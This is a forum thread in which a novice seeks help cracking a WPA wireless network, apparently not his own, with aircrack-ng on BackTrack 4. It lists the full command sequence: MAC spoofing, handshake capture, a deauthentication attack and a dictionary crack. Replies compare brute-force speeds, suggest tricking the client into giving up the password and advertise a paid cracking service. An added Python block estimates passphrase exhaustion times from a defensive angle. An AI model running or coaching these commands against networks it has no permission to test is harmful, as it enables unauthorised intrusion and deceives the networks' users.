Hey.
I'm a newbie, just spent a lot of hours trying to hack a wireless network. I'm using a BackTrack 4 ISO live CD to boot into BackTrack 4. I've spent a lot of hours reading a lot of "how to" guides, and I finally figured out how to do it. But when aircrack started to "hack" the password, it just said "Passphrase not in dictionary" after it tested 270 keys.
This is what I do:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
# then I choose a target (channel, bssid, essid) #
airodump-ng -c 11 -w wpa --bssid 00:26:18:90:1D:4D wlan0
# then I open another shell #
aireplay-ng -0 5 -a 00:26:18:90:1D:4D wlan0
# then I get a WPA handshake #
aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst
Then aircrack starts properly, I think, and tests about 270 keys in less than 1 sec, and then it says: Passphrase not in dictionary, quitting aircrack
What do I have to do?
Rasmus
Okay, now I found a password list with about 1 million passwords, and aircrack ran for about 3 hours, but still didn't find the key? Is it possible to find a WPA key?
Okay, I kinda get the whole thing now! The password list that comes with the BackTrack live CD is just kind of a "test" list, a really short one. I found some lists with more than 10 million different combinations, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words, and that's no guarantee of finding the right one... And the lists only have proper words, not keys like: a5Gi877KgP1gH3 <- something like that. There has to be an easier way to crack a WPA, maybe something to do with the WPA handshake or some kind of program that tries every possible combination from 8-63 letters, both lower case, upper case, numbers and whatever else is possible for a password to have in it. Can somebody help me out here?
You can try a generator to narrow down your combinations, run the cracker for days, or think of some other way to get the client to give you the password...
Use your imagination!
I have the same problem. I have a handshake, tried 3 dictionaries, 2x <10 million entries, one big 60 million. Still no result. Here in my country we speak Bulgarian. So it is possible that the pass is something not in English, and the lists are generally for English. I will try a test with numbers only, but it will take a long time.
If you want to try all the possibilities you will need around... a few billion years.
My computer tries 1500 pass/sec. It has a Core 2 Duo 3.00GHz Intel. But with my CUDA-enabled NVIDIA 9600GT I can go for up to 3100 passwords/s only with it.
So overall I reach ~4K. But there are many many many combinations.
Even with CUDA the computer spent 5 hours on the large list.
To try each numeric combination with 8 digits (100 000 000) my PC will need 7 hours. With 9 digits, 70. With 10, 700 hours!!!
With letters it is even harder. I will need 21 months only for 8 digits.
And for "only" 20 I will need... 160173521855785540 years. Even if you get 4 monster video cards you have no chance... yet.
Here is a time calculator: lastbit.com/jscalc.asp
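The figures in the post above, worked through as an added example that is not from any poster in this thread: each WPA/WPA2-PSK guess costs a 4096-round PBKDF2-HMAC-SHA1 derivation salted with the SSID (per IEEE 802.11i), which is why guess rates stay in the thousands per second. The function names and the passphrase policies are assumptions made for illustration; the 4000 guesses/s rate is the one quoted in the thread.

```python
import hashlib
import time

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise master key for WPA/WPA2-PSK (IEEE 802.11i):
    PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32-byte output."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def measure_rate(samples: int = 20) -> float:
    """Derivations per second on this machine, one CPU core, no GPU."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"constructed-{i:04d}", "ExampleSSID")  # constructed inputs
    return samples / (time.perf_counter() - start)

def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of passphrases over the charset with length in [min_len, max_len]."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def exhaust_seconds(charset_size: int, min_len: int, max_len: int, rate: float) -> float:
    """Worst-case time to try every candidate at `rate` guesses per second."""
    return keyspace(charset_size, min_len, max_len) / rate

def humanize(seconds: float) -> str:
    """Render a duration in the largest unit that fits."""
    for unit, size in (("years", 31_557_600), ("days", 86_400), ("hours", 3_600)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.0f} seconds"

# Constructed passphrase policies to compare: (label, charset size, length)
POLICIES = [
    ("8 digits", 10, 8),
    ("10 digits", 10, 10),
    ("8 lowercase letters", 26, 8),
    ("14 mixed-case letters and digits", 62, 14),
    ("20 lowercase letters", 26, 20),
]

if __name__ == "__main__":
    thread_rate = 4000.0  # guesses/s, the CPU + GPU figure quoted in the thread
    print(f"this machine: {measure_rate():.0f} PMK derivations/s on one core")
    for label, charset, length in POLICIES:
        t = exhaust_seconds(charset, length, length, thread_rate)
        print(f"{label:34s} {humanize(t)}")
```

For anyone choosing a passphrase for their own network, the table shows that a short numeric key falls within hours at this rate, while a long random one is out of reach of exhaustive search.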
WPA is not considered safe, at least not by me, and I'm not talking about TBs of drive space, cracking clouds, FPGAs, server/GPU arrays, etc. WPA is useless now, to a smart little falsification attack taking 10-20 minutes. This being said, for the average auditor the best chance one has is to use an online WPA auditing service.
PureH@te runs pretty much the best online WPA audit available right now, save yourself the time, MONEY, and effort and use his service for a mere $10. Available here